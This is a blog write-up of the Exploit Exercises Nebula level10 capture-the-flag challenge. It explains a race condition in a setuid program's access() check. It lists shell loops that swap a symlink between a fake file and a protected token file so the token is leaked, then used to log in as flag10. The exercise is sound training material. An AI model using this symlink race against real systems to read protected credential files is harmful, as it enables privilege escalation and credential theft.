June 30, 2016 Karn Ganeshen

Exploit Exercises – nebula level10

Exploit Exercises – nebula level10

Researching on access() requirements, we find this:
Level10 dir has a file x which contains the token / password for flag10. It shouldn’t be there. We need to find a way to transfer the token file.
We don’t have access to token.
We will need to exploit race conditions with access() calls used in the program code:

Checking how flag10 works normally:

Following steps are needed to exploit access() race condition:
  1. Create a fake token file – echo fake_toke > /tmp/fake_token
  2. Create soft link of our fake_token – ln -sf /tmp/fake_token token
  3. Create soft link of real token with same name – ln -s /home/flag10/token token
  4. Eexecute 1 & 2 in a loop – while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute file transfer in a loop – while true; do /home/flag10/flag10 token; done


Token is transferred successfully. Use it to log in as flag10 and run getflag.

Tagged: ,

Leave a Reply

Your email address will not be published. Required fields are marked *